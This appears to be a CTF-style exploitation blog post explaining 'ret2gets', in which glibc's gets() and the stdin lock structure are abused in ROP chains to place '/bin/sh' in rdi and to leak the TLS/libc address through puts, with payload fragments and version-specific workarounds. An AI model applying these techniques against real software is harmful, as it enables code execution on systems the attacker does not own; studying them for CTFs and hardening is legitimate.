ret2gets
Who needs "pop rdi" when you have gets()
Ah, the gets function: a staple of insecure coding and overflow challenges, reading as much data as it can up to a \n. While most people are interested in its unlimited overflow, I'm interested in its applications for rdi control, and even libc leaks. What am I talking about, you may be asking?
Well, let's go back to the demo program.
Running this under gdb, let's enter any string and see what happens to the registers after gets. As you probably know, many functions clobber their argument registers: they have no need to preserve them, so they use them as scratch registers, in other function calls, or both. For gets, all we'd need is some writable address to land in rdi, and then perhaps we could do something?
Bingo! We have an address which appears to live in libc's writable region, so by calling gets again in our ROP chain, we could overwrite libc data, perhaps smashing some useful structures. Without a libc leak, though, what we can do with that is limited. There could be multiple ways to utilise this, but the one I'm most interested in here is smashing _IO_stdfile_0_lock.
_IO_stdfile_0_lock
Let's not beat around the bush: glibc's IO is complicated, so much so that there's a whole category of exploitation dedicated to it, called FSOP. That won't be the focus here; instead we're looking at what's generally overlooked when it comes to glibc IO: locking.
Because glibc supports multithreading, many glibc functions need to be thread-safe, meaning they're resistant to data races. This is a problem for glibc IO, because multiple threads can share the same FILE structure, and if 2 threads try to use it at the same time, the resulting race condition can corrupt the FILE. We fix this using locks.
If you've ever looked at glibc source code for IO functions (as you do), you may have noticed a common pattern in a lot of them (except printf and scanf, which are more complicated; more on those later). Let's take gets (2.35 for now):
At the start of the function it uses _IO_acquire_lock, and at the end it uses _IO_release_lock. The idea is that acquiring the lock tells other threads that stdin is currently in use, and any other thread that tries to access stdin will be forced to wait until this thread releases the lock, signalling that stdin is no longer in use.
For this reason, FILE has a field _lock, which is a pointer to an _IO_lock_t (stored at offset +0x88):
I had some trouble finding the necessary macros and functions for acquiring and releasing locks, so I'll make a note here. I use Elixir Bootlin for reading and searching the glibc code base. When searching for _IO_acquire_lock, we get multiple definitions, which isn't very helpful (same thing for _IO_release_lock).
So which one gets used?
sysdeps/htl: This is the Hurd version, which would be used on GNU Hurd. This isn't nearly as common as GNU/Linux, so we can ignore this one.
sysdeps/generic: Like the name suggests, this is a fallback designed to work anywhere that doesn't have a specific definition. It isn't used in our case.
libio/libioP.h: Seems to be another fallback, used when _IO_MTSAFE_IO isn't defined. With these definitions no locking is done at all, which implies this is for when we don't care about thread safety. In our case _IO_MTSAFE_IO is set, so we can ignore this.
The correct one is sysdeps/nptl, otherwise known as the Native POSIX Threads Library.
_IO_acquire_lock/_IO_release_lock
These macros are defined as follows:
This may look confusing, but the 2 important functions to take away from this are _IO_flockfile and _IO_acquire_lock_fct. The __attribute__((cleanup)) may look bizarre, but all it does is call _IO_acquire_lock_fct on _fp when the artificial do-while(0) block ends (basically at the end of the IO function). _IO_acquire_lock_fct is defined as:
So really, the 2 macros that do the locking and unlocking are _IO_flockfile and _IO_funlockfile.
_IO_USER_LOCK=0x8000 is a flag which seems to indicate whether or not the inbuilt locking should be used. This is usually used internally, for example in the helper streams inside printf. For our purposes we can ignore it, as this check will always pass for stdin (or any of the standard streams for that matter). Finally we get to the macros that we care about: _IO_lock_lock and _IO_lock_unlock.
_IO_lock_lock/_IO_lock_unlock
_IO_lock_lock and _IO_lock_unlock are defined as:
Note that _name is the lock itself, which in the case of gets is _IO_stdfile_0_lock.
Let's break this down. The owner field stores the address of the TLS (Thread Local Storage) structure for the thread currently using the lock (if you're wondering what the TLS structure is, it's the structure whose address is stored in the fs register; it also stores the canary, and you've likely seen fs:[0x28] in disassembly). So when locking, if the owner is different to THREAD_SELF (i.e. the lock is owned by a different thread), it uses lll_lock to wait until that thread has unlocked, then claims ownership of the lock. When unlocking, it removes its ownership, and signals that the lock is no longer in use with lll_unlock.
The use of cnt is a bit bizarre to me. The only way I could see this being useful is if the same thread had to take the lock multiple times, perhaps due to recursive(?) calls. Perhaps it's just a flexibility thing, I'm not sure. But what I can tell you is that this will be useful for us in a moment ;)
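To make the bookkeeping concrete, here is a toy Python model of the 2.30-2.36 behaviour described above. It is a sketch, not glibc code: the THREAD_SELF value is a made-up address, the futex wait inside lll_lock is reduced to setting a flag, and it reads cnt as a re-entry counter for the owning thread, which is one interpretation.

```python
from dataclasses import dataclass

THREAD_SELF = 0x7FFFF7D8A740  # hypothetical TLS address, for illustration only


@dataclass
class IOLock:
    """Toy stand-in for _IO_lock_t: int lock; int cnt; void *owner."""
    lock: int = 0
    cnt: int = 0
    owner: int = 0  # 0 plays the role of NULL


def io_lock_lock(l: IOLock, me: int = THREAD_SELF) -> None:
    if l.owner != me:
        # Real lll_lock would block here if another thread held the lock;
        # this single-threaded model just takes it.
        l.lock = 1
        l.owner = me
    l.cnt = (l.cnt + 1) & 0xFFFFFFFF  # cnt is a 32-bit int


def io_lock_unlock(l: IOLock) -> None:
    l.cnt = (l.cnt - 1) & 0xFFFFFFFF
    if l.cnt == 0:
        l.owner = 0
        l.lock = 0  # lll_unlock: release the lock (and wake any waiter)


stdin_lock = IOLock()
io_lock_lock(stdin_lock)    # outer IO call takes the lock
io_lock_lock(stdin_lock)    # same thread re-enters: only cnt grows
io_lock_unlock(stdin_lock)  # still held, cnt drops back to 1
held = (stdin_lock.owner, stdin_lock.cnt)
io_lock_unlock(stdin_lock)  # cnt reaches 0: owner cleared, lock released
```

The point to carry forward is that the release path only runs when the decremented cnt is exactly 0, so whoever controls cnt controls whether owner and lock get reset.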
_IO_stdfile_0_lock in rdi?
You may be wondering why this happens, and while this is slightly bizarre, I can give an educated guess.
For one thing, _IO_lock_unlock is what's called at the very end of most IO functions, including gets, so its effects on the registers are the most recent before returning, with nothing afterwards clobbering them.
Above is the disassembly of _IO_lock_unlock. rbp stores the address of stdin, so +182 is checking _IO_USER_LOCK. But then look at +191. Recall that _lock is stored at an offset of +0x88, so this must be loading stdin._lock, which as we know is _IO_stdfile_0_lock, and we see that it's loading into rdi! Then pretty soon afterwards it returns, without clobbering rdi (__lll_lock_wait_private doesn't clobber it either, it's just a thin wrapper around the futex syscall).
So that's where _IO_stdfile_0_lock comes from, but why does _lock get loaded into rdi in the first place?
That's a good question, to which my best guess would be that it's an optimization made by the compiler. In the case where lll_unlock is called, the address of _lock is passed directly to the futex wrapper as the one and only argument (i.e. through the rdi register). Therefore it loads _lock into rdi up front, so that it doesn't need an extra instruction like mov rdi, [register containing _lock] to prepare the call to the futex wrapper, which saves space and time.
2.30
While we're mainly looking at 2.34+, let's have a brief look at versions prior to that. It appears that prior to 2.30, the disassembly looks a bit different. For example, the following is from 2.29.
Instead of loading it into rdi, it loads it into rdx, then later into rdi just for the futex call? And what's going on with rsp around the call to __lll_unlock_wake_private? This would be a bizarre choice for a compiler to make, and the reason is that it wasn't one: this part is written in assembly. I couldn't tell you why, but what I can say is that this causes problems for us, as _lock only gets loaded into rdi under very specific circumstances, which hinders our potential techniques.
For fun, I decided to write a Python script which uses angr to detect this behaviour automatically for a given libc.
The libc doesn't require debug symbols, and the script should work for 2.23-2.39, as these were the versions I tested (2.39 is the most recent version as of writing this).
Now for the fun stuff. I'm gonna show you 2 simple techniques which can help you with your ropping: one for controlling rdi and another for leaking libc.
I'll demonstrate these using the demo program, which is patched to run using glibc 2.35 (that'll be important later).
rdi
One idea you may have already had is that, since _IO_stdfile_0_lock always ends up in rdi after a call to gets, and gets allows us to write arbitrary data to the pointer in rdi, then surely we can just write /bin/sh to _IO_stdfile_0_lock, right?
If you were thinking that, then good job, because you're correct, we can!
Since rdi -> _IO_stdfile_0_lock, another call to gets will write data there. Then we'd send /bin/sh, and that 2nd call to gets will return with _IO_stdfile_0_lock -> "/bin/sh" in rdi. This would get around needing to use pop rdi ; ret to get a pointer to /bin/sh, so if you had system available, then you could get a shell!
One important thing to note is that after we overwrite the lock, _IO_lock_unlock will be executed before we return. This will decrement cnt, and if the new cnt is 0, then owner gets NULL'ed and lll_unlock will clobber our data! This is why it's important to overwrite cnt with a value other than 1, and, since cnt gets decremented, that value has to be 1 more than the bytes we actually want left there. The code for this would be as follows:
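As a minimal sketch of that adjustment, the snippet below builds the payload and replays what gets and the unlock do to the 16 bytes of the lock. It assumes the 2.30-2.36 unlock logic and the lock/cnt/owner layout described earlier; gets_then_unlock is a hypothetical helper for illustration, not part of glibc or pwntools.

```python
import struct


def gets_then_unlock(mem: bytearray, line: bytes) -> None:
    """Model gets(rdi=lock) on 2.30-2.36: write the line plus a terminating
    null over the lock, then apply _IO_lock_unlock's decrement of cnt."""
    data = line + b"\x00"
    mem[:len(data)] = data
    cnt = (struct.unpack_from("<I", mem, 4)[0] - 1) & 0xFFFFFFFF
    struct.pack_into("<I", mem, 4, cnt)
    if cnt == 0:
        # owner = NULL and lll_unlock resets lock: the string is clobbered
        mem[0:4] = b"\x00" * 4
        mem[8:16] = b"\x00" * 8


# Bytes 0-3 are lock, bytes 4-7 are cnt, bytes 8-15 are owner.
naive = bytearray(16)
gets_then_unlock(naive, b"/bin/sh")        # cnt's low byte '/' becomes '.'

lock_mem = bytearray(16)
payload = b"/bin" + bytes([ord("/") + 1]) + b"sh"  # low byte of cnt is '/' + 1
gets_then_unlock(lock_mem, payload)        # the decrement turns '0' back into '/'
```

In an exploit script the same bytes would be sent with p.sendline(payload) in response to the second gets.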
While this will of course SEGFAULT, we see our desired result of rdi -> "/bin/sh"!
Another thing to note is that /bin/sh will remain in _IO_stdfile_0_lock until we change it back, so after any subsequent calls to gets, we'll get back this pointer to /bin/sh. Even though the locking will increment cnt, it will leave the rest of the contents alone, and unlocking will then decrement it back.
This relies on being able to skip over lll_unlock by having a large value for cnt.
But for 2.29 and prior, it only loads _lock into rdi when calling lll_unlock, so this won't work, as rdi won't end up pointing to _IO_stdfile_0_lock -> "/bin/sh".
I also found out that I'm not the first person to discover this, w3th4nds beat me to it with the challenge Sound of Silence, and I wouldn't be surprised if it's been found/used before then, I just hadn't seen it before writing this.
There are a few ways you can leak libc using gets. For one, if you have access to printf, then you can just use the trick above to enter a format string and then call printf.
But what if you don't have printf, and instead have only puts? Well fear not, because we have another trick up our sleeves: _lock.owner.
Recall the _IO_lock_t structure:
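For reference while reading the leak, the layout can be mirrored with ctypes. This is a sketch assuming the three fields discussed earlier (an int lock, an int cnt and a pointer owner); the class name IOLock is just an illustrative label.

```python
import ctypes


class IOLock(ctypes.Structure):
    """Illustrative mirror of _IO_lock_t as described in this post."""
    _fields_ = [
        ("lock", ctypes.c_int),      # futex word: 0 = free, 1 = locked
        ("cnt", ctypes.c_int),       # how many times the owner holds it
        ("owner", ctypes.c_void_p),  # THREAD_SELF of the owning thread
    ]


# Byte offset of each field from the start of the lock.
offsets = {name: getattr(IOLock, name).offset for name, _ in IOLock._fields_}
```

So owner starts 8 bytes into the lock, which means 8 bytes of non-null padding are needed in front of it before puts will print it.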
And also recall that owner gets assigned the address of the TLS structure for this thread. While it isn't immediately at the start of the lock, it's not far out of our reach, so what if we were able to pad up to it, then call puts? Since TLS (at least for the main thread) is allocated relative to libc, all you'd need is the offset from TLS to libc base.
Unfortunately this leak can cause problems depending on the kernel(?), because the TLS can be in different places on different machines, and it doesn't seem to be fixable by using the same docker.
So keep that in mind when transferring the exploit to remote.
While I suspect this is due to a kernel difference, if anyone knows exactly why, I'd love to hear it, and I could include it here as well.
There are initially a few problems with this:
All input using gets is terminated by a null byte
owner gets NULL'ed when unlocking if --cnt==0 (i.e. cnt==1)
But both of these can be solved with one input:
The main idea behind this is that we want to set cnt=0, so that when it comes to unlocking, it will decrement cnt first, then check it against 0, which fails because now cnt=0xffffffff, due to an integer underflow. This eliminates the terminating null byte from gets, and since the check fails, owner doesn't get NULL'ed either. That gives us uninterrupted padding up to owner=TLS, so we can then call puts and leak TLS.
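The underflow can be replayed offline with a small model. This is a sketch under the same assumptions as before (2.30-2.36 logic, lock/cnt/owner at offsets 0/4/8); the TLS value is a made-up address and gets_on_lock and puts_output are hypothetical helpers.

```python
import struct

TLS = 0x7FFFF7D8A740  # hypothetical THREAD_SELF, for illustration only


def gets_on_lock(mem: bytearray, line: bytes, me: int = TLS) -> None:
    """Model one gets(rdi=lock) call: lock, write the input, unlock."""
    lock, cnt, owner = struct.unpack_from("<IIQ", mem, 0)
    if owner != me:                       # _IO_lock_lock
        lock, owner = 1, me
    cnt = (cnt + 1) & 0xFFFFFFFF
    struct.pack_into("<IIQ", mem, 0, lock, cnt, owner)

    data = line + b"\x00"                 # gets appends the terminator
    mem[:len(data)] = data

    lock, cnt, owner = struct.unpack_from("<IIQ", mem, 0)
    cnt = (cnt - 1) & 0xFFFFFFFF          # _IO_lock_unlock: --cnt
    if cnt == 0:
        lock, owner = 0, 0
    struct.pack_into("<IIQ", mem, 0, lock, cnt, owner)


def puts_output(mem: bytearray) -> bytes:
    """Bytes puts(lock) would print: everything up to the first null."""
    return bytes(mem).split(b"\x00", 1)[0]


lock_mem = bytearray(16)
# "AAAA" fills lock; three nulls plus gets' terminator make cnt = 0.
gets_on_lock(lock_mem, b"A" * 4 + b"\x00" * 3)
leak = puts_output(lock_mem)
tls_leak = struct.unpack("<Q", leak[8:].ljust(8, b"\x00"))[0]
```

After the call, cnt has wrapped to 0xffffffff and owner still holds the TLS address, so the output is 8 bytes of padding followed by the pointer.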
The above was tested on 2.35, and should work for 2.30-2.36, but 2.37 changed _IO_lock_lock and _IO_lock_unlock to:
Bit more complicated now, but the main takeaways are:
The inclusion of SINGLE_THREAD_P
cnt is only decremented if cnt != 0
It seems that cnt = 0 now doesn't necessarily imply that the lock isn't being used, but rather that it isn't being used by 2+ instances.
This forces us to adjust our techniques slightly, especially for leaking libc (the controlling of rdi, in its current state anyway, hasn't been affected). This is because we can no longer cause an integer underflow to eliminate the terminating null byte, as it refuses to decrement cnt=0.
Fortunately there is a way around this, but it will require an extra call to gets.
So what's going on here?
The main aim of the first gets is to do the following:
Set lock = 0, which marks the lock as unlocked.
Fill cnt with junk.
Clobber owner so that owner != THREAD_SELF
Then on the last call to gets, when _IO_lock_lock is executed:
The first check (SINGLE_THREAD_P together with owner == NULL) will fail, even if the process is single-threaded, because we set owner to junk, so owner != NULL. You could do a version where this case passes if you wanted; I decided to make the technique not reliant on the process being single-threaded (i.e. more versatile).
The next check (owner != THREAD_SELF) will succeed.
The lll_lock call that follows is unfortunately unavoidable, but since we set lock = 0, the lock is marked as unlocked, so this will just lock it (set lock = 1).
Bingo! The owner gets set to the TLS structure, which is what we want to leak.
Since lock = 1, it contains null bytes which would terminate puts, so here we need to fill lock with junk ("CCCC"). But what about the null byte from gets? Just like before, the cnt getting decremented in unlocking will help to eliminate this null byte.
p.sendline(b"CCCC") will write a null byte into the LSB of cnt. In _IO_lock_unlock, cnt gets decremented as cnt != 0, which converts the \x00 into \xff, and just like before, the unlocking will leave owner alone.
And just like that, we now have padding up to owner=TLS.
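The two-call sequence can be checked with the same kind of offline model. This is a sketch of the 2.37+ logic as summarised above, not the glibc source: TLS is a made-up address, the helper names are hypothetical, and the first payload (lock = 0, junk cnt, junk owner) is one choice that satisfies the three aims listed.

```python
import struct

TLS = 0x7FFFF7D8A740  # hypothetical THREAD_SELF, for illustration only


def gets_on_lock(mem: bytearray, line: bytes, me: int = TLS,
                 single_thread: bool = True) -> None:
    """Model one gets(rdi=lock) call with the 2.37+ lock/unlock logic."""
    lock, cnt, owner = struct.unpack_from("<IIQ", mem, 0)
    if single_thread and owner == 0:      # fast path: nobody owns it
        lock, owner = 1, me
    elif owner != me:                     # lll_lock on a free lock, then claim
        lock, owner = 1, me
    else:                                 # re-entry by the owner
        cnt = (cnt + 1) & 0xFFFFFFFF
    struct.pack_into("<IIQ", mem, 0, lock, cnt, owner)

    data = line + b"\x00"                 # gets appends the terminator
    mem[:len(data)] = data

    lock, cnt, owner = struct.unpack_from("<IIQ", mem, 0)
    if cnt == 0:                          # release for real
        lock, owner = 0, 0
    else:                                 # otherwise only decrement
        cnt = (cnt - 1) & 0xFFFFFFFF
    struct.pack_into("<IIQ", mem, 0, lock, cnt, owner)


def puts_output(mem: bytearray) -> bytes:
    return bytes(mem).split(b"\x00", 1)[0]


def run(single_thread: bool) -> bytes:
    mem = bytearray(32)                   # the lock plus some bytes after it
    first = struct.pack("<I", 0) + b"A" * 4 + b"B" * 8
    gets_on_lock(mem, first, single_thread=single_thread)
    gets_on_lock(mem, b"CCCC", single_thread=single_thread)
    return puts_output(mem)


leak = run(single_thread=True)
tls_leak = struct.unpack("<Q", leak[8:].ljust(8, b"\x00"))[0]
```

In this model the result is the same whether or not SINGLE_THREAD_P holds, matching the aim of not relying on the process being single-threaded.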
This version of the leak will actually work before 2.37 as well, so this is the more versatile one.
rdi != _IO_stdfile_0_lock?
This is all pretty cool (in my opinion at least; if you disagree, you're wrong), but what if we were presented with the following program:
Now we have a problem. While gets would place _IO_stdfile_0_lock into rdi, the subsequent puts call would clobber it. Now what?
Ideally we'd want to find a way to put _IO_stdfile_0_lock into rdi, and fortunately there are a few tricks we can use in certain cases:
rdi is writable
Even if it isn't _IO_stdfile_0_lock, any writable rdi would be a valid candidate for a gets call, which would then put _IO_stdfile_0_lock back into rdi!
A common case for this is after some other IO function. Recall that most IO functions follow that locking pattern, which includes puts. So in the above example, rdi would be _IO_stdfile_1_lock, which we can just call gets on to get our beloved _IO_stdfile_0_lock. For dealing with another IO lock, you can use p.sendline(b"\x01"), as the expected value for lock will be 1 (LLL_LOCK_INITIALIZER_LOCKED).
rdi is readable
While this won't make for a valid candidate for gets, it would make a valid candidate for puts, so a call to puts would put us into Case 1 (rdi is writable), and you can then apply the above.
rdi == NULL
This won't be usable in most IO functions unfortunately. But printf isn't just another IO function, it's built different. Let's take a look, shall we? Don't worry, we won't go too far ;)
Note that scanf follows a very similar pattern, and displays the same behaviour as printf in this regard.
printf is defined as follows:
Here we see it calls __vfprintf_internal with the first argument (i.e. rdi) being stdout.
Then in __vfprintf_internal we see that early on it calls ARGCHECK
The main takeaway from all of this is that ARGCHECK forces printf to return early if format == NULL, meaning it won't SEGFAULT. And since __vfprintf_internal was called with stdout as the first argument, we can guess that it should be preserved until returning. So, is it?
Yes it is! So now we can just use this as a writable address.
There's also a possibility here to use an FSOP technique to get a leak. I won't go into detail here, but if you're interested here are some links:
Normally fflush is called with a single FILE to flush its contents:
However you can call fflush(NULL), which will go through every FILE and flush all of them.
It does this by calling _IO_flush_all.
Then at the end of _IO_flush_all(_lockp), it first unlocks list_all_lock, which is used to lock the list of all FILEs. While this would put a lock into rdi, that's not what reaches the end.
It then calls _IO_cleanup_region_end(0), which is effectively just:
This then goes on to call __libc_cleanup_pop_restore with a first argument of &_buffer, which is preserved until returning. _buffer is a cleanup buffer, which is stored on the stack, so a stack pointer is returned in rdi! For more information, see here.
rdi is junk
There's actually a non-IO function that can be used here: rand, which returns a pointer to unsafe_state in rdi across a broad range of libc versions. More details on this can be found here.
In theory, these functions would be perfect. The argument wouldn't matter, and as IO functions usually unlock at the very end, they would place a lock into rdi (getchar would give you _IO_stdfile_0_lock). Unfortunately, there's an optimization in the way: _IO_need_lock.
So if the FILE is determined to not need a lock, then it doesn't use one?
It turns out that for some simpler IO functions, the locking can be optimized away in the single-threaded case:
And when a thread is made, _IO_enable_locks is called, which ensures all new and old FILEs have the _IO_FLAGS2_NEED_LOCK flag set.
So, when the application is multithreaded, getchar/putchar would use locking, otherwise it would just follow the behaviour of _IO_(getc|putc)_unlocked.
Since this is a macro, the fp wouldn't be loaded into rdi, so the only chance you really have is if __uflow, for example, did something useful. In getchar, if stdin is unbuffered (or the buffer is empty), it will call read(0, ...), which leaves rdi=0, and maybe you can then use the rdi == NULL case functions.
These are just a few functions which can help, there could be many more that I'm not aware of. Most of these are just some common ones which have one thing in common: they're IO functions.
If anyone has any other tricks for this, I'd be interested to know, and maybe I'll update this to include them, with credit of course :)